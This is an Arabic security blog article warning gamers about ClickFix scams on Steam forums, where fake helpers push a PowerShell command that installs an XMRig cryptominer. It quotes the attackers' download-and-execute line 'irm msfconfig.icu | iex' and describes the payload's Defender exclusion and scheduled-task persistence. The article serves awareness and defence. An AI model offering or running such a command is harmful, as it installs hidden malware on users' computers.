نصيحة سيئة للاعبين: هجمات ClickFix تستهدف منتديات Steam

أصبحت منتديات Steam أحدث ساحات المعارك لهجمات ClickFix. ونوضح هنا بالتفصيل كيف يتنكر المهاجمون في هيئة معلقين يقدمون المساعدة، لخداع اللاعبين وحملهم على تثبيت برامج لتعدين العملات المشفرة على أجهزة الكمبيوتر الخاصة بهم.

أسلوب ClickFix على منتديات Steam: كيف تُثبّت أوامر PowerShell الخبيثة برنامجًا لتعدين العملات المشفرة

شهد هذا العام طفرة حقيقية في هجمات ClickFix. وقد لاقت رواجًا وإقبالاً هائلاً بين مجرمي الإنترنت لدرجة أننا بالكاد ننتهي من تفكيك أحد أساليبها حتى يحين وقت تغطية الأسلوب التالي.

هذه المرة، يستهدف المهاجمون اللاعبين: رصد صحفيون تقنيون منشورات تروّج لنصائح خبيثة على منتديات Steam. وفيما يلي نستعرض شكل هذه المنشورات، ونوع البرامج الضارة التي تُستخدم لنشرها، وكيفية الحفاظ على أمان جهازك.

أسلوب ClickFix يجد طريقه إلى منتديات Steam

يلجأ العديد من اللاعبين إلى زملائهم في منتديات Steam للحصول على المساعدة والمشورة في أمور مثل تجاوز مهمة معقدة، أو رفع مستوى الشخصية، أو الحصول على أفضل الغنائم والمكافآت، أو الالتفاف على خطأ برمجي. وتلك الثقة تحديدًا في نصائح المجتمع هو ما قرر المهاجمون استغلاله.

يبدأ الهجوم عندما يرد المجرمون على استفسار لأحد المستخدمين بشأن تعطل مفاجئ في الألعاب، أو فقدان عناصر من المخزون، أو غير ذلك من المشكلات الفنية. ويتنكرون في هيئة معلقين يقدمون المساعدة، ويقترحون تشغيل أداة PowerShell كمسؤول وتنفيذ أمر يدّعون أنه يحل المشكلة التي يواجهها المستخدم.

منشور لمهاجم خبيث على منتدى Steam

متخفياً وراء تقديم نصائح لاستكشاف الأخطاء وإصلاحها، يقترح المهاجم الخبيث تشغيل أداة PowerShell كمسؤول وتنفيذ أمر يُزعم أنه يصلح المشكلة التي يواجهها المستخدم. المصدر

كما قد تتوقع، فإن تنفيذ هذا الأمر لا يصلح أي شيء، بل يفتح بابًا واسعًا لمشاكل لا حصر لها. وهذه هي الفكرة الأساسية وراء هجمات ClickFix: استخدام الهندسة الاجتماعية لخداع الضحايا لحملهم على اتخاذ إجراءات غير آمنة بأنفسهم، مما يمنح المحتالين ما يحتاجون إليه لاختراق الجهاز. وقد غطينا حيلاً أخرى لأسلوب ClickFix من قبل – مثل اختبارات CAPTCHA المزيفة، وأخطاء المتصفح الوهمية، وغيرها الكثير – وجميعها يعتمد على دفع الضحية لتشغيل الأمر الخبيث بنفسه. ويمكنك قراءة المزيد عن الأشكال المختلفة لهجمات ClickFix في منشورنا السابق.

يكمن مكر استخدام أسلوب ClickFix على منتديات Steam في أن الهجوم قد لا يقتصر على اللاعب الذي طلب المساعدة فحسب؛ بل يمكن أن يقع ضحيته عدد لا يحصى من اللاعبين الآخرين الذين يواجهون المشكلة ذاتها ويعثرون على هذه الإجابة عبر بحث Google.

دليل تمهيدي سريع: ما الذي يكمن حقاً وراء أمر irm | iex

قبل أن نتطرق إلى ما يخدع المهاجمون به اللاعبين لتثبيته بهذه الطريقة، يتعين علينا استعراض بعض الخلفيات التقنية. مبدئيًا، تنصح تلك المنشورات على منتديات Steam الضحايا المحتملين الغافلين عن الخطر بتشغيل الأمر التالي في PowerShell:

irm msfconfig.icu | iex

بالنسبة لشخص غير ملمّ بتفاصيل أداة PowerShell، قد يبدو هذا السطر غير ضار تمامًا – إذ يشبه تشغيل أداة تكوين النظام MSConfig المدمجة في Windows مع بعض المعلمات الإضافية.

في الواقع، هذا الأمر أبعد ما يكون عن الأمان. دعونا نتناول بالتفصيل ما يفعله كل جزء من هذا السطر البرمجي فعليًا:

  1. irm هو اختصار لأمر PowerShell المدمج Invoke-RestMethod. وهو يتصل بعنوان الويب المحدد لاحقا في السطر ويسترد البيانات الواردة في الاستجابة.
  2. icu هو عنوان الويب المقصود – وليس اسم ملف محلي كما قد يبدو للوهلة الأولى. وهذا هو خادم المهاجمين، ويستجيب لطلب irm بإرسال برمجية نصية خبيثة عبر PowerShell.
  3. iex هو أمر PowerShell مضمّن آخر، وهو اختصار لعبارة Invoke-Expression. حيث يأخذ كل ما يسترده الأمر irm من عنوان الويب ذاك وينفذه كتعليمات برمجية عبر PowerShell.

بمجرد تنفيذه، يقوم هذا السطر البرمجي في PowerShell بتنزيل برنامج نصي من الموقع المحدد وتشغيله على الفور. وكما أشار أحد مستخدمي Reddit محقًا، يمكنك استكشاف التعليمات البرمجية الفعلية الذي كان سيتم تنزيله على جهازك بأمان – ودون المخاطرة بتنفيذه – بمجرد حذف الجزء الثاني iex. وبدونه، سيكتفي الأمر بتنزيل محتويات البرنامج النصي وطباعتها داخل نافذة PowerShell دون تنفيذها. ويتيح لك ذلك فحص التعليمات البرمجية الكاملة والواضحة التي طُلب منك تشغيلها على جهازك. والآن، دعونا نستعرض ما يحاول أصحاب تلك المشاركات المتعاونون في منتديات Steam دفع اللاعبين لتثبيته فعليًا على أجهزتهم.

برنامج تعدين عملات مشفرة، وليس أداة تحسين

أتقن المهاجمون حيلتهم بعناية: يؤدي البرنامج النصي PowerShell الذي تم تنزيله من خادمهم دورًا مقنعًا في محاكاة أداة تحسين نظام Windows. وبمجرد تشغيله، يعرض للمستخدم سلسلة من الإشعارات التي تدّعي مسح الملفات المؤقتة، وتفريغ ذاكرة التخزين المؤقت لنظام DNS، وتحديث برامج التشغيل، وفحص القرص بحثًا عن الأخطاء، وتعطيل تطبيقات بدء التشغيل غير الضرورية، وفحص النظام لرصد البرامج الضارة، وإصلاح صورة نظام Windows، والتحقق من سلامة ملفات النظام.

تحسين وهمي لنظام Windows قيد التنفيذ

يعرض البرنامج النصي مجموعة متتابعة من الرسائل عن مهام تحسين وهمية متنوعة لتبدو وكأنها تجري عمليات صيانة مفيدة للنظام. المصدر

في هذه الأثناء، تجري الأنشطة الفعلية خلف الكواليس. ويبدأ البرنامج النصي بالتحقق مما إذا كان يعمل بامتيازات المسؤول. وفي حال توفرها، يُنشئ مجلد عمل مخفي في المسار C:\Windows\Background، ثم يضيفه إلى قائمة استثناءات Microsoft Defender. ومنذ تلك اللحظة فصاعدًا، تتوقف أداة مكافحة الفيروسات المدمجة في Windows عن فحص أي ملفات توضع داخل ذلك المجلد.

بعد ذلك، يُهيئ البرنامج النصي النظام للمرحلة التالية من الهجوم ويقوم بتنزيل ملف قابل للتنفيذ من خادم المهاجمين – مع حفظه داخل مجلد C:\Windows\Background ذاته تحت الاسم المضلل system.exe الذي يبدو وكأنه ملف نظام شرعي.

الملف الذي تم تنزيله هو XMRig، وهي إحدى أكثر الأدوات شيوعًا لتعدين العملة المشفرة Monero. ولا يُعد تطبيق XMRig بحد ذاته برامج ضارة، بل هي أداة تعدين مشروعة ومفتوحة المصدر. وتكمن المشكلة في قيام المهاجمين بتثبيته على أجهزة كمبيوتر الضحايا دون علمهم. وبمجرد تشغيله، يتم الاستيلاء على القدرة الحاسوبية للجهاز لتسخيرها في تعدين عملة Monero، بينما تذهب عائدات التعدين من العملات المشفرة مباشرة إلى المجرمين.

يجعل هذا الأمر من أجهزة اللاعبين أهدافًا جذابة للغاية: تضم أجهزة كمبيوتر الألعاب الحديثة معالجات مركزية وبطاقات رسومات فائقة القوة – وهي تحديدًا نوعية المكونات المثالية لتعدين العملات المشفرة.

لضمان بقاء البرامج الضارة واستمراريتها حتى بعد إعادة تشغيل الجهاز، ينشئ البرنامج النصي مهمة جديدة في جدول مهام Windows: ‏XMRig-{computer name}. ومنذ تلك اللحظة فصاعدًا، تُطلق المهمة أداة تعدين العملات المشفرة تلقائيًا في كل مرة يبدأ فيها تشغيل النظام.

كيفية حماية جهازك من برامج تعدين العملات المشفرة والبرامج الضارة الأخرى

للأسف، يتردد العديد من اللاعبين في تثبيت برامج الأمان – أو إبقائها قيد التشغيل – على أجهزتهم. ويعود السبب الرئيسي وراء ذلك إلى الخرافة الشائعة والمستمرة بأن برنامج مكافحة الفيروسات يبطئ أداء ألعابك. وقد تناولنا أبحاثًا حول هذا الأمر على مدونتنا من قبل، وأظهرت النتائج عدم وجود أي تأثير ملموس أو انخفاض ملحوظ في الأداء جراء تشغيل برنامج مكافحة الفيروسات أثناء اللعب.

يختلف الأمر تمامًا مع أدوات تعدين العملات المشفرة؛ فهي تُضعف الأداء بلا أدنى شك، بل وتُسرّع من تآكل مكونات جهازك واستهلاكها أيضًا. ما الذي يمكنك فعله لحماية كمبيوتر الألعاب الخاص بك وحساباتك من هذه المخاطر؟

  • تجنب تشغيل البرامج النصية لكل من PowerShell أو Terminal أو غيرها من أوامر موجه الأوامر التي يقترح عليك الغرباء نسخها وتنفيذها — سواء كان ذلك على المنتديات أو في غرف الدردشة أو في التعليقات.
  • قبل الضغط على Enter في أي أمر لا تفهمه تمامًا، ابحث عما يفعله والتداعيات المحتملة من تشغيله.
  • استخدم حل أمان موثوقًا به مع وضع ألعاب لرصد محاولات تنزيل البرامج الضارة في الوقت المناسب ومنعها من العمل.
  • لا تقم بتعطيل الحماية أثناء اللعب. ويُعد استخدام حل أمان مزود بوضع مخصص للألعاب هو الخيار الأمثل. [placeholder home security]وتقوم منتجات الأمان من Kaspersky[/placeholder] بتفعيل هذا الوضع تلقائيًا بمجرد إطلاق اللعبة، حيث تؤجل تحديثات قواعد بيانات مكافحة الفيروسات والإشعارات وعمليات فحص القرص المجدولة إلى حين انتهائك من اللعب.

هل ينتابك الفضول لمعرفة الطرق الأخرى التي يستهدف بها المهاجمون مجتمع اللاعبين؟ يمكنك إلقاء نظرة على مقالاتنا الأخرى:

النصائح

برمجيات تنقيب مخفية بداخل جووجل بلاي ستور!

عندما يصبح جهازك بطىء، يلوم العديد من المستخدمين البرمجيات الخبيثة والفيروسات. ولكن عندما يصبح هاتفك الذكي بطيء عادة ما تلوم البطارية او نظام التشغيل وعندها تريد شراء هاتف جديد! وربما يكون سبب هذه المشكلة شيء اخر تماماً!  برمجيات التنقيب المخفية!